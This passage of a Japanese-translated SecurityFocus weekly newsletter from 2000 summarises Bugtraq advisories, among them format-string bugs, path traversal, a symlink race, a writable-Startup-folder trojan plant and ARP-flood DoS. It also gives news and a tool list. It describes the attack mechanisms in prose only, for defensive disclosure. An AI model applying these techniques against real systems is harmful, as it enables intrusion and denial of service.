これらの弱点は、マシンに直接ログインできる場合のみ可能であり、そのため、
リモートからこの弱点を攻撃することは不可能である。
他の Windows NT の LPC の実装に由来した問題、Microsoft Security Bulletin
(MS00-070)、Bindview's Security Advisory は該当する Bugtraq ID の
Credit セクションを参照されたい。
26. Microsoft IE / Outlook com.ms.activeX.ActiveXComponent Arbitrary Program...
BugTraq ID: 1754
リモートからの再現性: あり
公表日: 2000-10-05
関連する URL:
http://www.securityfocus.com/bid/1754
まとめ:
悪意ある Web サイトの管理者が特別に組み立てられた Java オブジェクトを
HTML ドキュメント中に埋め込んである場合、Microsoft の Internet Explorer、
もしくは、Outlook で その Web ページを読んでしまったターゲットホスト上
で任意のプログラムの実行が可能である。<APPLET> タグを埋め込まれた
com.ms.activeX.ActiveXComponent Java オブジェクトは、たとえセキュリティ
上問題があると表示しても、任意の ActiveX オブジェクトの生成やスクリプテ
ィングを許してしまう。
仮に、Outlook が'security update'が適用されていた場合でも、Java を利用
すれば Active スクリプトの実行ができないように設定されていても巧く回避
して実行することが可能である。
任意のプログラムの実行が悪意ある Web サイトの管理者によって、サイトを参
照したユーザと同じ権限を奪取することで可能となる。
27. OpenBSD photurisd Format String Vulnerability
BugTraq ID: 1755
リモートからの再現性: なし
公表日: 2000-10-04
関連する URL:
http://www.securityfocus.com/bid/1755
まとめ:
Photurisd は、OpenBSD で IPSec の鍵管理を行なうデーモンである。これには、
攻撃者に root 権限で任意のプログラムの実行を許す書式指定子を利用した攻
撃を受けてしまう弱点がある。
Photurisd はコマンドラインから、参照する設定ファイルがあるディレクトリ
を記したパラメータを受け取る。報告されたところによると、photurisd は、
指定されたディレクトリのアクセスに失敗した場合、ユーザが入力したディレ
クトリをフォーマット文字列の一部としてログを取る関数 (これは printf()
関数を利用している) に渡す。悪意のあるユーザは、photurisd の権限で任意
のプログラムの実行を可能とする、書式指定子を含ませ、スタックへ書き込ま
せるようなディレクトリを指定する引数を作成できる。
この弱点を突くことに成功すれば、攻撃者は権限を昇格できる。
28. Microsoft IIS 5.0 Indexed Directory Disclosure Vulnerability
BugTraq ID: 1756
リモートからの再現性: あり
公表日: 2000-10-04
関連する URL:
http://www.securityfocus.com/bid/1756
まとめ:
Microsoft Internet Information Server 5.0 では Index Server が利用可能
である場合、リモートユーザは、Web Distributed Authoring and Versioning
(WebDAV) 検索の実装内の問題のために、/ ディレクトリの構造やその全ての
サブディレクトリを参照することが可能である。*.inc ファイルや普通のの
Web サイトのインターフェイスからは通常アクセスできないドキュメントまで
も含んだ隠しファイルが、この弱点を利用することで表示できてしまう。
この弱点を突くことに成功すれば、ユーザ名やパスワードなど機密扱いの情報
が記されたファイルを発見することが可能である。
IIS 5.0 では Index Server は、デフォルトで利用できない状態であり、
'Index' プロパティが設定されているディレクトリのみが、この弱点の影響を
受ける。
29. Multiple Vendor Cfengine Format String Vulnerability
BugTraq ID: 1757
リモートからの再現性: あり
公表日: 2000-10-01
関連する URL:
http://www.securityfocus.com/bid/1757
まとめ:
Cfengine は、TCP/IP ネットワークに接続された UNIX 互換のシステムの検査
や設定を行なうための言語に基づいたシステムである。cfd は、cfengine のク
ライアントからリモートで設定するためのデーモンコンポーネントで、syslog()
の適切に設計されていない呼び出し部分がある。その結果、信用されているホ
スト (もしくは、アクセスコントロールがなされていないなら、任意のユーザ)
はユーザが入力したフォーマット指定子を含んだような悪意のあるメッセージ
を生成し、ネットワークデーモンに転送する可能性がある。最低でも、サービ
スをクラッシュすることが可能である。特定のフォーマット指定子を送信する
ことで、悪意のあるユーザがプログラムのスタック部分を書き換え、実行のフ
ローを変更することが可能性がある。成功した場合、攻撃者は任意のプログラ
ムをデーモンの権限 (root) で実行可能である。
以下は、Pekka Savola <Pekka.Savola@netcore.fi> によって投稿された Bugtraq
からの引用である。
"VERSIONS AND PLATFORMS AFFECTED:
- --------------------------------
1.6.0a11 を除く最近のバージョンはすべて、2000 年 10 月 1 日にリリースさ
れた。
1.5.x および 1.6.0a10 は、Red Hat Linux 上でテストした。しかしこれは、
Red Hat、または、Powertools の一部ではない。少なくとも、Debian は、パッ
ケージに cfengine が含まれる。
FreeBSD 3.4 や 4.1 で再現しようと試みた。不運だった。同じ方法で、または、
別の方法で再現できたとしても私は驚かないだろう。
Linux でない他のプラットフォームではテストしていないが、もし cfd を実行
しているなら、そのプラットフォームで問題がないかチェックすることを提案
する。
30. Microsoft Windows 2000 Unattended Install OEMPreinstall Vulnerability
BugTraq ID: 1758
リモートからの再現性: なし
公表日: 2000-04-07
関連する URL:
http://www.securityfocus.com/bid/1758
まとめ:
All Users と Default User ディレクトリは、OEMPreinstall オプションが
1 に設定されているという、アンサーファイルで注意されていないインストー
ルが行われている間、いかなる権限でも書き込み可能なままである。
悪意のあるユーザは、他のユーザがシステムにログインしようとすると自動的
に実行するトロイの木馬を
\{All Users}{Default User}\Start Menu\Programs\Startup に挿入することが
可能である。
前述のディレクトリは、Administrator と SYSTEM グループによってのみ書き
込み可能であるべきである。
31. OpenBSD Pending ARP Request Remote DoS Vulnerability
BugTraq ID: 1759
リモートからの再現性: あり
公表日: 2000-10-05
関連する URL:
http://www.securityfocus.com/bid/1759
まとめ:
OpenBSD にはリモートから DoS を引き起こすことができる弱点がある。この問
題は未決定の ARP リクエストの保存に制限がないことにより、リクエスト過剰
の状態での扱いに失敗するためによる。攻撃者が、どういったわけか、犠牲と
なるマシンに大量の ARP リクエストを送信した場合、カーネルパニックを引き
起こし、ターゲットとなるシステムを停止させる原因となる。
これは、特定の環境下で可能である。攻撃は以下のように実行される。
OpenBSD マシンが、広大なアドレス空間を持つネットワーク (クラス C が 2
つ以上であること) 上にある場合、攻撃者は、そのネットワークにあるホスト
のアドレスに偽造したパケットを OpenBSD マシンに送信する。その際、犠牲と
なるホストは他のホストに MAC アドレスを調べるためにARP リクエストを送信
する。十分な数の ARP リクエストが送られた場合、カーネルは次のメッセージ
を出してパニック状態に陥る。
"out of space in kmem_map"
そして、フリーズする。
32. Multiple Vendor MIME Header DoS Vulnerability
BugTraq ID: 1760
リモートからの再現性: あり
公表日: 1998-09-03
関連する URL:
http://www.securityfocus.com/bid/1760
まとめ:
Apache Web Server と MessageMedia UnityMail は、8000 バイトという意味の
あるサイズの MIME ヘッダが送信された場合、DoS 攻撃の影響を受けやすくな
る。両方のソフトはクラッシュし、通常の機能を回復するには再起動が必要と
なる。他の Web サーバも同様に、この攻撃の弱点を持つ可能性がある。
33. GnoRPM Arbitrary File Overwrite Vulnerability
BugTraq ID: 1761
リモートからの再現性: なし
公表日: 2000-10-02
関連する URL:
http://www.securityfocus.com/bid/1761
まとめ:
Gnome 上のグラフィカルな RPM 管理ツールである、GnoRPM の v0.95 以前の
バージョンには、gnomerpm が一時ファイルを扱う方法に弱点が存在する。
GnomeRPM はいかなる権限でも書き込み可能な /tmp ディレクトリに予測可能
な名前を付けた一時ファイルを生成する。悪意あるユーザは、事前に
GnomeRPM が root によって実行されていて、/tmp ディレクトリ中に推測もし
くは予測可能なファイル名が付けられたシンボリックリンクを作成できる。
これが実行された場合、正しく推測されたシンボリックリンクによって指され
るファイルが、GnomeRPM によって(root 権限で)上書きされてしまう。
重要なファイルが上書きされた場合、ローカルから DoS が引き起こされてし
まう。
34. Moreover.com CGI File Disclosure Vulnerability
BugTraq ID: 1762
リモートからの再現性: あり
公表日: 2000-10-02
関連する URL:
http://www.securityfocus.com/bid/1762
まとめ:
ニュース配信ベンダ Moreover.com によって供給される cached_feed CGI スク
リプトのバージョン 1.0 には弱点が存在する。このスクリプトの obtain_file
関数は、ブラウザで表示するように指定したファイルの内容を返すように設計
されているが、ユーザの入力の ".." という文字列を適切にフィルタリングす
ることに失敗してしまう。その結果、スクリプトに送信する URL が注意深く形
成されたものの場合、CGI スクリプトが "許した" 領域の外に(http ユーザに
よって読める) ファイルを開示してしまう。
ベンダーは、スクリプトを修正し、この弱点が公になる前にバージョン 2.0 を
リリースした。
35. IBM WebSphere ikeyman Weak Encrypted Password Vulnerability
BugTraq ID: 1763
リモートからの再現性: あり
公表日: 1999-10-24
関連する URL:
http://www.securityfocus.com/bid/1763
まとめ:
IBM WebSphere は、IBM HTTP Server と SSL 接続が利用できる場合、サーバの
証明書、または、鍵ペアを暗号化する 'ikeman' と呼ばれるツールを同梱して
いる。ikeman はパスワードをフリーで利用できるスクリプト (対応する Bugtraq ID
の Exploit を参照されたい) を利用して容易に復号できる隠しファイルに保存
する。
III. SECURITYFOCUS.COM NEWS AND COMMENTARY
- ------------------------------------------
1. Carnivore Details Emerge
著者: Kevin Poulsen
October 4, 2000
ワシントン発
FBI の Carnivore 監視ツールは電子メールだけを監視していたわけではなかった。
Freedom of Information Act の下で、 Electronic Privacy Information
Center (EPIC) によって新たに機密指定が外されたドキュメントは、Carnivore
は標的となるユーザの Internet トラフィックをすべて監視できること、また、
他の FBI ツールと組み合わせて、Web をサーフィンしている間に監視の標的が
見た Web ページを再構築することができることを明らかにした。
http://www.securityfocus.com/templates/article.html?id=97
2. U.S. picks new Encryption Standard
著者: Kathleen Ellis
October 2, 2000
メリーランド州 Gaithersburg 発
困難を極めた 3 年に渡る活発な議論と競争が今朝終了し、米国政府は新しい標
準暗号アルゴリズムについて告知した。
Rijndael (RHINE-dahl と発音、訳注: 日本語ではラインダールが適当か)とい
う名前で知られるこのアルゴリズムは、今朝、30 年の歴史を誇るデータ暗号標
準 (DES) の後継として、次世代暗号標準 (AES) を発表した。この新しいアル
ゴリズム選考の過程は、1997 年の 1 月 に始まり、National Institute for
Standards in Technology (NIST) によって調整された。新しい標準は米国政府
諸機関によって利用され、製品のソフトウエア開発者によって広く実装される
だろう。
http://www.securityfocus.com/templates/article.html?id=96
IV.SECURITY FOCUS TOP 6 TOOLS
- -----------------------------
1. Samhain 0.9.5
AIX, HP-UX, Linux, Solaris and Unixware
作者: Rainer Wichmann (rwichmann@hs.uni-hamburg.de)
関連する URL:
http://samhain.sourceforge.net/
Samhain は、ネットワーク上のホストを集中監視するためのクライアントサー
バアプリケーションとしても利用できる、ファイルシステムの一貫性チェッカー
です。認証された TCP/IP の接続でログサーバからのレポートを送信すること
に加えて、いくつかの他のログをとる機能 (電子メール、コンソール、
tamper-resistant ログファイル、syslog) が利用できます。Samhain は、
Linux、AIX 4.1、HP-UX 10.20、Unixware 7.1.0、Solaris 2.6 で動作確認がな
されています。
2. BUGS 3.4.3
FreeBSD, HP-UX, Linux, NetBSD, OpenBSD, Solaris, SunOS, UNIX,
Windows 2000, Windows 3.x,Windows 95/98 and Windows NT
作者: Sylvain Martinez (martinez@encryptsolutions.com)
関連する URL:
http://www.bcrypt.com
BUGS は強力な秘密鍵暗号アルゴリズムとそのアプリケーションです。使用する
ことは難しくなく、サンプルアプリケーションとドキュメントがあります。こ
の暗号のライブラリはフリーで利用することができます。マルチプラットフォ
ームに対応し、オープンソースで、ファイル暗号化アプリケーション、セキュ
アなチャット、セキュアな"more"コマンド、ログインアプリケーションなどか
らなるパッケージが提供されています。
3. Linux Intrusion Detection System (LIDS) 0.9.9
作者: Xie Hua Gang, xhg@gem.ncic.ac.cn
関連する URL:
http://www.lids.org/
Linux Intrusion Detection System はカーネルのセキュリティを拡張するパッ
チです。一度このパッチが有効になった場合、選択されたファイルへのアクセス、
すべてのシステム/ネットワーク管理操作、すべての権限付き動作、raw デバイ
スの動作、メモリおよび I/O アクセスは root でさえ利用できなくできます。
また、利用者はどのファイルに何というプログラムがアクセスできるのかを定義
できます。管理下に収めたいと希望する、システムの権限付き動作を利用し、拡
張し、ネットワークとファイルシステムについてのセキュリティ機能を、カーネ
ルにセキュリティ機能を拡張することで追加します。また、重要なプロセスの隠
蔽、ネットワーク越しのセキュリティ警告メッセージの受信等のセキュリティ保
護機能を明確に調整することも可能です。
4. Snorticus 1.0
Linux and Solaris
作者: Paul Ritchey
関連する URL:
http://snorticus.baysoft.net/
Snorticus は、多数のセンサから集められた Snort のデータの自動検索と処理
をサポートするために使われる有益なスクリプトの集合体です。基本的な考え
は、データを収集するために配置した多数のセンサをもつことです。このデー
タは一時間ごとに'包まれ'、集めたデータを解析するために使われるボックス
に引っ込め (SnortSnarf)、そして、Web インターフェイスから、解析済みのデ
ータをアナリストが見るために使われます。Snorticus は多数のサイトからの
データを扱うだけでなく、同じセンサを利用して (同じセンサに多数の Snort
を実行することによって) 同時に多数のサブネットを扱うことが可能です。個
人センサデータ (または、'サイト'のデータ) は分割されたままであるのに対
して、もしセンサーが多数のサブネットを監視しているなら、データは自動的
に結合され、多数の Snort が、多数のサブネットを一つのものとして同じセン
サで監視していることを例に挙げます。Snorticus はタイムゾーンをこえたサ
イトをサポートします。センサーで検索して正しい日付/時間を検知し、アナリ
ストボックスにあるすべてのデータは多くても 1 時間です。
5. The Coroner's Toolkit (TCT)
FreeBSD, Linux, OpenBSD, Solaris and SunOS
作者: Dan Farmer and Wietse Venema
関連する URL:
http://www.porcupine.org/forensics/tct.html
TCT は、割り込み後、UNIX システムの post-mortem 解析に使うことができる
プログラムを集めたものです。このソフトウエアは、われわれが一年前 (ほと
んど同じ日) に開講 free Computer Forensics Analysis class の間、最初
に示されました。
注目に値するコンポーネントは、情報を捕まえる grave-robber ツール、ファ
イルが生きているか死んでいるかのパターンを表示する ils と mactime ツ
ール、消されたファイルを再生する unrm と lazarus ツール、実行されている
プロセス、または、ファイルから暗号鍵を再生する keyfind ツールがあります。
6. Bcrypt 2.3
Windows 2000, Windows 95/98 and Windows NT
作者: Sylvain Martinez
関連する URL:
http://www.bcrypt.com
これはすでに広く知られている bcrypt Windows 版ソフトウェアの新しい Windows
版アプリケーションです。このバージョンでは新しい暗号化ライブラリと新し
く互換性を保ち、暗号化、復号化、キー生成、ファイルの隠蔽機能が利用でき
る様になっています。BUGS v3.4.0 の提供する動的プライベートキー暗号化ア
ルゴリズムを利用した Windows GUI を提供しています。また、ユーザが利用し
やすく、オープンソースで、複数のプラットフォームで動作します。
実際、暗号化、復号化、キー生成、ファイルの隠蔽機能をお試し頂けます。
- --
Translated by SAKAI Yoriyuki, KAGEYAMA Tetsuya
Little eArth Corporation - LAC Co., Ltd.
http://www.lac.co.jp/security/
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Edition 5.5.5J
Comment: SAKAI Yoriyuki
iQA/AwUBOeJx0ZQwtHQKfXtrEQJkJACePYCkWcS4UH8kzQa7mMX0nP4M+E4AoLsB
dmQBqmDrVx4A4pZqRjVsE6uE
=EVg6
-----END PGP SIGNATURE-----